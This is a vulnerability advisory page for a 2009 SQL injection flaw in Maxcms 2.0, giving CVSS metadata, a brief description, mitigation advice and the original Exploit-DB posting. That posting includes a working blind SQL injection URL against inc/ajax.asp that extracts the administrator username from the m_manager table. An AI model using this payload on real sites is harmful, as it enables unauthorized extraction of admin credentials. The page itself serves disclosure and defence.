Maxcms 2.0 SQL Injection Vulnerability

vendor:

Maxcms

by:

Securitylab.ir

6,5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Maxcms

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: N/A

Related CWE: N/A

CPE: a:maxcms:maxcms:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Maxcms 2.0 SQL Injection Vulnerability

A SQL injection vulnerability exists in Maxcms 2.0. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can potentially result in the manipulation or disclosure of application data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

######################### Securitylab.ir ########################
# Application Info:
# Name: Maxcms
# Version: 2.0
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
#===========================================================
# http://site.com/inc/ajax.asp?action=digg&amp;id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

# milw0rm.com [2009-05-18]